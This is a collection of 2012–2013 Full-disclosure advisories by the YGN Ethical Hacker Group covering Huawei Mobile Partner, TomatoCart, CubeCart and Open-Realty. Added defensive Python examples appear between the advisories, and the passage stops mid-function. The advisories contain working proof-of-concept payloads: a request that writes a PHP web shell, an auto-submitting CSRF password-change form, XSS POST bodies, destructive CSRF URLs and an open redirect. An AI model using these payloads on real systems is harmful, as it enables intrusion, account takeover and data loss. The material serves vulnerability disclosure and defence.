[Full-disclosure] Huawei Mobile Partner | Permission Weakness Local Privilege Escalation

2013-02-11 Thread YGN Ethical Hacker Group
1. DESCRIPTION

Huawei Mobile Partner application contains a flaw that may allow an
attacker to gain access to unauthorized privileges. The issue is due
to the application installing with insecure permissions. This allows a
less privileged local attacker or compromised process to replace the
original application binary with a malicious application which will be
executed by a victim user or upon Mobile Partner application Windows
service restart.


2. BACKGROUND

Mobile Partner is a built-in application in Huawei 3G USB modems that
allows you to connect to the 3G mobile network for Internet access. It
is widely used by many telcos around the world.


3. VERSIONS AFFECTED

Tested version: 23.007.09.00.203.


4. PROOF-OF-CONCEPT/EXPLOIT

/// Tested on Windows

c:\>wmic service get pathname | find "Mobile Partner"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe"
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
  RW Everyone
  RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe"
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
  RW Everyone
  RW BUILTIN\Users

c:\>accesschk -q "C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe"
C:\Program Files (x86)\Mobile Partner\Mobile Partner.exe
  RW Everyone
  RW BUILTIN\Users


/// Tested on Mac

YEHG:MacOS tester$ ls -Rl /Applications/Mobile\ Partner.app/ | grep rwxrwxrwx | grep '\(app\|mobilepartner\)'
-rwxrwxrwx 1 root admin 82496 Oct 6 17:34 mobilepartner
drwxrwxrwx 3 root admin 102 Oct 6 17:34 XStartScreen.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 LiveUpd.app
drwxrwxrwx 3 root admin 102 Oct 6 17:34 ouc.app
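The permission check above can be turned into detection logic that runs over accesschk output. The following is an added example and is not part of the advisory: it parses accesschk -q style listings and flags every service binary on which Everyone, BUILTIN\Users or Authenticated Users hold write rights. The sample output is constructed to mirror the listing in this advisory, and the principal set and the exact output shape are assumptions about what the tool prints.

```python
"""Flag service binaries that low-privilege principals can write, from
`accesschk -q` style output.  Added example, not from the advisory; the
sample output below is constructed to mirror its listing."""
import re

# Principals that must never hold write/modify rights on a service binary
# (compared case-insensitively).  Assumed set; extend for your environment.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
}

# Constructed sample in the shape `accesschk -q <file>` prints: the path,
# then indented "<rights> <principal>" lines.
SAMPLE_ACCESSCHK_OUTPUT = r"""
C:\Program Files (x86)\Mobile Partner\UpdateDog\ouc.exe
  RW Everyone
  RW BUILTIN\Users
C:\Program Files (x86)\Mobile Partner\eap\wifimansvc.exe
  RW Everyone
  RW BUILTIN\Users
C:\Windows\System32\svchost.exe
  R  Everyone
  R  BUILTIN\Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
"""

RIGHTS_LINE = re.compile(r"^\s+(?P<rights>[RW]+)\s+(?P<principal>\S.*?)\s*$")


def parse_accesschk(text):
    """Return {path: [(rights, principal), ...]} from accesschk -q output."""
    entries = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        m = RIGHTS_LINE.match(line)
        if m and current is not None:
            entries[current].append((m.group("rights"), m.group("principal")))
        else:
            # An unindented line starts a new file entry.
            current = line.strip()
            entries[current] = []
    return entries


def writable_by_low_priv(entries):
    """Return {path: [principal, ...]} for binaries a low-privilege account can modify."""
    findings = {}
    for path, aces in entries.items():
        offenders = [p for rights, p in aces
                     if "W" in rights and p.lower() in LOW_PRIV_PRINCIPALS]
        if offenders:
            findings[path] = offenders
    return findings


if __name__ == "__main__":
    for path, who in writable_by_low_priv(parse_accesschk(SAMPLE_ACCESSCHK_OUTPUT)).items():
        print(f"WRITABLE by {', '.join(who)}: {path}")
```

Run against real output by piping `accesschk -q` over every path returned by `wmic service get pathname`; the two Mobile Partner binaries in the sample are reported, svchost.exe (writable only by SYSTEM and Administrators) is not.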


5. SOLUTION

The vendor has not responded to our security report for months.
The workaround is to remove the WRITE permission on all Mobile Partner
executable files for non-administrator and non-system accounts.


6. VENDOR

Huawei Technologies Co.,Ltd


7. CREDIT

Myo Soe, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


8. DISCLOSURE TIME-LINE

2012-10-xx: Contacted the vendor through publicly mentioned emails and forums
2013-02-11: No response
2013-02-11: Vulnerability not fixed
2013-02-11: Vulnerability disclosed


9. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/huawei_mobile_partner-insecure_permission

#yehg [2013-02-11]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] TomatoCart 1.x | Cross Site Request Forgery Protection Bypass via JavaScript Hijacking

2013-01-06 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Cross Site Request Forgery
Protection Bypass.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw in the script
'/admin/tocdesktop.php', which fails to properly protect the JavaScript
object `token` that is used to prevent Cross Site Request Forgery
attacks. This allows an attacker to obtain the token object via
JavaScript Hijacking when an administrator user visits his crafted
page. Using the compromised token value, the attacker is then able to
perform administrator-privileged functions such as uploading files,
creating user accounts and so forth.
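The weakness is the delivery channel: a token handed out as executable JavaScript can be included by any origin with a script tag, and the browser sends the administrator's cookies along. The following is an added example, not TomatoCart code, showing the hijackable handler next to one that only answers same-origin XMLHttpRequest/fetch callers and returns JSON instead of a script; the handler shape, the session dict and the header policy are assumptions.

```python
"""Serving an anti-CSRF token so that a cross-site <script src> include
cannot read it.  Added example, not TomatoCart code; the handler shape,
session dict and header policy are assumptions."""
import json
import secrets


def new_session():
    """Constructed session with a fresh per-session token."""
    return {"token": secrets.token_hex(16)}


def vulnerable_token_script(session):
    """Token delivered as executable JavaScript.  Any page on any origin can
    include this URL with <script src=...>; the browser attaches the admin's
    cookies, runs the response, and the attacker's page then reads
    window.token.  This is the JavaScript hijacking the advisory describes."""
    return {"status": 200, "content_type": "text/javascript",
            "body": "var token = %s;" % json.dumps(session["token"])}


def hardened_token_response(session, headers):
    """Deliver the token only to same-origin XMLHttpRequest/fetch callers.

    - A <script> tag or <form> from another site cannot attach a custom
      header, and a cross-origin fetch that tries to is stopped by the CORS
      preflight, so requiring X-Requested-With blocks the include.
    - Sec-Fetch-Site / Sec-Fetch-Dest (sent by current browsers) reject
      cross-site and script-destination fetches outright; when absent the
      custom-header check above is the gate.
    - The body is a JSON object, not a JavaScript statement, so nothing is
      assigned even if it is ever evaluated as script.
    """
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return {"status": 403, "content_type": "text/plain",
                "body": "missing same-origin request header"}
    if headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return {"status": 403, "content_type": "text/plain",
                "body": "cross-site fetch refused"}
    if headers.get("Sec-Fetch-Dest", "empty") == "script":
        return {"status": 403, "content_type": "text/plain",
                "body": "script include refused"}
    return {"status": 200, "content_type": "application/json",
            "headers": {"X-Content-Type-Options": "nosniff",
                        "Cache-Control": "no-store"},
            "body": json.dumps({"token": session["token"]})}


if __name__ == "__main__":
    s = new_session()
    print(vulnerable_token_script(s)["body"])
    print(hardened_token_response(s, {"Sec-Fetch-Site": "cross-site",
                                      "Sec-Fetch-Dest": "script"})["status"])  # 403
```

The same idea applies to any admin endpoint that echoes session secrets: never return them in a resource that a script tag can load, and pair the endpoint with SameSite cookies so the cookies are not attached to cross-site includes in the first place.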


4. VERSIONS AFFECTED

Tested on 1.x

(Note that we did not verify this issue on upcoming 2.x version -
currently it's on alpha.)


5. PROOF-OF-CONCEPT/EXPLOIT

The following recorded movie will demonstrate how we can leverage the
CSRF-bypass flaw to create an arbitrary shell script.

http://yehg.net/lab/pr0js/training/view/misc/TomatoCart-Anti-CSRF-Bypass-2-Shell/


6. SOLUTION

The vendor did not show commitment to hardening the application.
The workaround is not to visit malicious web sites while logged in, or
to use a dedicated browser for TomatoCart administration.
It is recommended to use an alternative shopping cart application with
a good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability information was sent
2013-01-07: Vulnerability not fixed
2013-01-07: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_ant-csrf_bypass
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
Other TomatoCart Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_vulnerable_piwik
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-07]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] TomatoCart 1.x | Vulnerable Piwik Extension

2013-01-05 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions include outdated and vulnerable Piwik extension  0.5.5.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions include an outdated and vulnerable Piwik
extension (0.5.5, according to the Piwik SVN checkout date specified
in /ext/piwik/index.php). This Piwik version has known vulnerabilities
such as Cross Site Scripting, Arbitrary URL Redirect and
Denial-of-Service.


4. VERSIONS AFFECTED

1.x


5. PROOF-OF-CONCEPT/EXPLOIT

Refer to REFERENCES section for the OSVDB site URL featuring known
Piwik vulnerabilities.


6. SOLUTION

The vendor did not show commitment to hardening the application.
It is recommended to use an alternative shopping cart application with
a good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-05: Vulnerability not fixed
2013-01-05: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/
Piwik Reported Vulnerabilities:
http://osvdb.org/search/search?search%5Bvuln_title%5D=piwiksearch%5Btext_type%5D=alltextsearch%5Bs_date%5D=January+1%2C+2010search%5Be_date%5D=January+5%2C+2013

#yehg [2013-01-05]



[Full-disclosure] TomatoCart 1.x | Unrestricted File Creation

2013-01-04 Thread YGN Ethical Hacker Group
1. OVERVIEW

TomatoCart 1.x versions are vulnerable to Unrestricted File Creation.


2. BACKGROUND

TomatoCart is an innovative Open Source shopping cart solution
developed by Wuxi Elootec Technology Co., Ltd. It is forked from
osCommerce 3 as a separate project and is released under the GNU
General Public License V2. Equipped with the web2.0 Technology Ajax
and Rich Internet applications (RIAs), TomatoCart Team is devoted to
building a landmark eCommerce solution.


3. VULNERABILITY DESCRIPTION

TomatoCart 1.x versions contain a flaw related to the /admin/json.php
script's failure to properly restrict created files. This may allow an
attacker to create an arbitrary shell script and launch further attacks
on the application server.


4. VERSIONS AFFECTED

Tested on 1.1.8, 1.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

///
POST /admin/json.php HTTP/1.1
Host: localhost
Cookie: admin_language=en_US; toCAdminID=edfd1d6b88d0c853c2b83cc63aca5e14
Content-Type: application/x-www-form-urlencoded
Content-Length: 195

module=file_manager&action=save_file&file_name=0wned.php&directory=/&token=edfd1d6b88d0c853c2b83cc63aca5e14&ext-comp-1277=0wned.php&content=<?+echo+'<h1>0wned!</h1><pre>';+echo+`ls+-al`;+?>
///
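The request above succeeds because the save handler accepts any file name and any directory. The following is an added example, not TomatoCart's /admin/json.php, of a save routine that keeps writes inside a fixed base directory, treats the client's directory as relative (so "/" and "../" cannot escape), and refuses executable or non-allowlisted extensions anywhere in the name; the function names, the base directory and the extension lists are assumptions.

```python
"""Hardened 'save file' handler for a web file manager: keep writes inside a
fixed base directory and refuse anything the server would execute.  Added
example, not TomatoCart's /admin/json.php; names and paths are assumptions."""
import tempfile
from pathlib import Path

# Extensions the web server would execute: never accepted, at any position
# in the name (so shell.php.txt is refused as well).
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar",
                         ".cgi", ".pl", ".py", ".sh", ".htaccess"}
# Positive allowlist for the final extension.
ALLOWED_EXTENSIONS = {".txt", ".css", ".js", ".html", ".csv", ".md", ".json"}


class FileSaveError(ValueError):
    """Raised for any request the handler refuses."""


def safe_save_file(base_dir, directory, file_name, content):
    """Write `content` to <base_dir>/<directory>/<file_name> with all checks applied.

    Returns the Path written.  Raises FileSaveError on: path components in the
    file name, dot-files, executable or non-allowlisted extensions, and any
    directory that resolves outside base_dir.
    """
    base = Path(base_dir).resolve()

    # 1. The file name must be a single, non-hidden path component.
    name = Path(file_name).name
    if not name or name != file_name or name.startswith("."):
        raise FileSaveError("invalid file name")

    # 2. Extension policy: deny executables anywhere, allow only known types.
    suffixes = {s.lower() for s in Path(name).suffixes}
    if suffixes & EXECUTABLE_EXTENSIONS or Path(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise FileSaveError("extension not allowed")

    # 3. The client's directory is always relative to base; '/' and '..' can
    #    never move the target outside it after resolution.
    target_dir = (base / directory.lstrip("/\\")).resolve()
    if target_dir != base and base not in target_dir.parents:
        raise FileSaveError("directory escapes base")

    target_dir.mkdir(parents=True, exist_ok=True)
    target = target_dir / name
    target.write_text(content, encoding="utf-8")
    return target


def demo_base_dir():
    """Fresh temporary base directory for running the example."""
    return tempfile.mkdtemp(prefix="filemanager-")


if __name__ == "__main__":
    base = demo_base_dir()
    print(safe_save_file(base, "/", "notes.txt", "hello"))
    for d, n in [("/", "0wned.php"), ("/", "shell.php.txt"), ("../../", "a.txt")]:
        try:
            safe_save_file(base, d, n, "x")
        except FileSaveError as e:
            print(f"refused {d}{n}: {e}")
```

Even with these checks the base directory should sit outside the document root, or be served with script execution disabled, so that a mistake in the allowlist cannot become code execution.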


6. SOLUTION

The vendor did not show commitment to hardening the application.
It is recommended to use an alternative shopping cart application with
a good track record of security fixes.


7. VENDOR

Wuxi Elootec Technology Co., Ltd.


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-04-22: Contacted the vendor through email
2012-04-29: Vendor replied and the vulnerability detail was sent
2013-01-04: Vulnerability not fixed
2013-01-04: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Btomatocart1.x%5D_arbitrary_file_creation
TomatoCart Home Page: http://www.tomatocart.com/

#yehg [2013-01-04]



Re: [Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling

2013-01-01 Thread YGN Ethical Hacker Group
5.x only


On Sat, Dec 29, 2012 at 11:02 AM, Sean Jenkins s...@bluehost.com wrote:
 Is it known if this exploit affects CubeCart versions 3.x and/or 4.x, or
 just 5.0.[0..6]?

 Sean Jenkins
 Sr. System Administrator


 On 12/28/2012 8:13 AM, YGN Ethical Hacker Group wrote:

 1. OVERVIEW

 CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
 File Handling which leads to the disclosure of the application
 configuration file.


 2. BACKGROUND

 CubeCart is an out of the box ecommerce shopping cart software
 solution which has been written to run on servers that have PHP &
 MySQL support. With CubeCart you can quickly setup a powerful online
 store which can be used to sell digital or tangible products to new
 and existing customers all over the world.


 3. VULNERABILITY DESCRIPTION

 CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
 up the configuration file, global.inc.php, upon new installation or
 upgrade process. The name of backup configuration file is set to the
 year, month, day, hour, minute that the process is performed.  The
 non-randomized nature of this backup scheme allows an attacker to
 retrieve the file through brute-force method.


 4. VERSIONS AFFECTED

 5.0.7 and lower versions


 5. Affected Files

 /setup/setup.install.php
 /setup/setup.upgrade.php

 /// CODE ///
 ## Backup existing config file, if it exists
 if (file_exists($global_file)) {
     rename($global_file, $global_file.'-'.date('Ymdgi'));
 }
 /// END ///

 e.g.
 http://127.0.0.1/cube507/includes/global.inc.php-2012021245719  \


 6. SOLUTION

 Upgrade to the latest CubeCart version - 5.x.


 7. VENDOR

 CubeCart Development Team
 http://cubecart.com/


 8. CREDIT

 Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


 9. DISCLOSURE TIME-LINE

 2012-03-24: Vulnerability reported
 2012-12-28: Vulnerability disclosed


 10. REFERENCES

 Original Advisory URL:
 http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
 CubeCart Home Page: http://cubecart.com/

 #yehg [2012-12-28]

 -
 Best regards,
 YGN Ethical Hacker Group
 Yangon, Myanmar
 http://yehg.net
 Our Lab | http://yehg.net/lab
 Our Directory | http://yehg.net/hwd





[Full-disclosure] CubeCart 5.x | Cross Site Request Forgery (CSRF) Vulnerability

2013-01-01 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Request Forgery (CSRF).


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.x versions contain a flaw that allows a remote Cross-site
Request Forgery (CSRF / XSRF) attack. The flaw exists because the
application does not require multiple steps or explicit confirmation
for sensitive transactions in the majority of administrator functions,
such as adding a new user or granting a user administrative privileges.
By using a crafted URL, an attacker may trick the victim into visiting
his web page to take advantage of the trust relationship between the
authenticated victim and the application. Such an attack could trick
the victim into executing arbitrary commands in the context of their
session with the application, without further prompting or
verification.


4. VERSIONS AFFECTED

5.x


5. Proof-of-Concept

http://localhost/admin.php?_g=documents&node=index&delete=1
(Delete file in Site Documents)
http://localhost/admin.php?_g=filemanager&mode=digital&delete=1
(Delete file in File Manager)
http://localhost/admin.php?_g=settings&node=admins&action=edit&admin_id=2
(Delete user)
http://localhost/admin.php?_g=customers&sort%5Bregistered%5D=DESC&action=delete&customer_id=1
(Delete customer user)
http://localhost/admin.php?_g=products&sort%5Bupdated%5D=DESC&delete=1
(Delete product)


6. SOLUTION

The vendor has chosen not to fix the issue.
The workaround is not to visit malicious sites while logged in.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_csrf
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]


[Full-disclosure] CubeCart 5.x | Multiple Cross Site Scripting Vulnerabilities

2013-01-01 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.x versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an
attacker to conduct Cross Site Scripting attacks. This may allow an
attacker to create a specially crafted URL that would execute arbitrary
script code in a victim's browser.


4. VERSIONS AFFECTED

5.x


5. Affected URLs and Parameters

/admin.php (report[date][from] parameter)
/admin.php (report[date][to] parameter)
/index.php (review[email] parameter)
/index.php (review[name] parameter)
/index.php (review[title] parameter)


6. SOLUTION

The vendor has chosen not to fix the issue.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: Vulnerability disclosed
2012-12-24: The vendor replied that the fix would not be implemented.
2013-01-01: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5x%5D_xss
CubeCart Home Page: http://cubecart.com/

#yehg [2013-01-01]


[Full-disclosure] CubeCart 5.0.7 and lower versions | Insecure Backup File Handling

2012-12-28 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Insecure Backup
File Handling which leads to the disclosure of the application
configuration file.


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that insecurely backs
up the configuration file, global.inc.php, during a new installation
or an upgrade. The name of the backup configuration file is derived
from the year, month, day, hour and minute at which the process is
performed. The non-randomized nature of this backup scheme allows an
attacker to retrieve the file through a brute-force method.


4. VERSIONS AFFECTED

5.0.7 and lower versions


5. Affected Files

/setup/setup.install.php
/setup/setup.upgrade.php

/// CODE ///
## Backup existing config file, if it exists
if (file_exists($global_file)) {
    rename($global_file, $global_file.'-'.date('Ymdgi'));
}
/// END ///

e.g.
http://127.0.0.1/cube507/includes/global.inc.php-2012021245719  \


6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-28: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_5.0.7%5D_insecure-backup
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-28]



[Full-disclosure] Open-Realty CMS 3.x | Cross Site Request Forgery (CSRF) Vulnerability

2012-12-25 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions in the majority of
administrator functions, such as adding a new user or granting a user
administrative privileges. By using a crafted URL, an attacker may
trick the victim into visiting his web page to take advantage of the
trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

<!-- Change Password -->
<form action="http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data" method="POST">
  <input type="hidden" name="user&#95;id" value="2" />
  <input type="hidden" name="user&#95;first&#95;name" value="Well" />
  <input type="hidden" name="user&#95;last&#95;name" value="Smith" />
  <input type="hidden" name="user&#95;email" value="hacker&#64;yehg.net" />
  <input type="hidden" name="phone" value="123456789" />
  <input type="hidden" name="mobile" value="9151403793" />
  <input type="hidden" name="fax" value="" />
  <input type="hidden" name="homepage" value="http&#58;&#47;&#47;yehg.net" />
  <input type="hidden" name="info" value="test" />
  <input type="hidden" name="edit&#95;user&#95;pass" value="agent" />
  <input type="hidden" name="edit&#95;user&#95;pass2" value="agent" />
  <input type="submit" value="Submit form" />
</form>
<script>
  document.forms[0].submit();
</script>


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]



[Full-disclosure] Open-Realty CMS 3.x | Persistent Cross Site Scripting (XSS) Vulnerability

2012-12-25 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an
attacker to conduct Cross Site Scripting attacks. This may allow an
attacker to create a specially crafted URL that would execute arbitrary
script code in a victim's browser.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

/admin/ajax.php (parameter: title, full_desc, ta)

///

POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;

edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=

///
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/admin/index.php?action=edit_blog_post&id=65
Cookie: PHPSESSID=e2c83ff285b488f33d2c830979a38e09;

blogID=65&title=about+us&ta='<script>alert('Error')</script>&description=&keywords=&status=1&seotitle=about-us
///


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_xss
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]



[Full-disclosure] CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out-of-the-box ecommerce shopping cart software
solution written to run on servers that have PHP & MySQL support.
With CubeCart you can quickly set up a powerful online store which can
be used to sell digital or tangible products to new and existing
customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the redir parameter. This
allows an attacker to create a specially crafted URL that, if clicked,
would redirect a victim from the intended legitimate web site to an
arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

5.0.7 and lower


5. Affected URL and Parameter

/admin.php (redir parameter)
/admin.php?redir=//yehg.net/%3f (Redirect after login)
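The sample above uses a protocol-relative value: no scheme, but a leading "//" that browsers resolve to another host. The following is an added example, not CubeCart code, of validating a post-login redir parameter so that only a path on the site's own origin is accepted; SITE_ORIGIN and the default landing page are assumptions.

```python
"""Validating a post-login `redir` parameter so that it can only lead back
into the site.  Added example, not CubeCart code; SITE_ORIGIN is an
assumption."""
from urllib.parse import urljoin, urlsplit, urlunsplit

SITE_ORIGIN = "https://shop.example"   # assumed origin of the application
DEFAULT_AFTER_LOGIN = "/admin.php"


def safe_redirect_target(redir, default=DEFAULT_AFTER_LOGIN):
    """Return a same-site, path-only redirect target or `default`.

    Rejected: anything with a scheme or host (http://evil, //evil.net/,
    javascript:), protocol-relative forms with extra or back slashes
    (///evil, /\\evil) that browsers normalise to a host, control
    characters, and relative paths that do not start at the site root.
    """
    if not redir or len(redir) > 2048:
        return default
    # Backslashes and control characters are normalised away by browsers in
    # ways the URL parser below does not model, so refuse them outright.
    if any(ord(c) < 0x20 or c == "\\" for c in redir):
        return default
    # Protocol-relative ("//host") including the "///host" variant.
    if redir.startswith("//"):
        return default
    parts = urlsplit(redir)
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        return default
    # Belt and braces: resolve against our origin and confirm the host is still ours.
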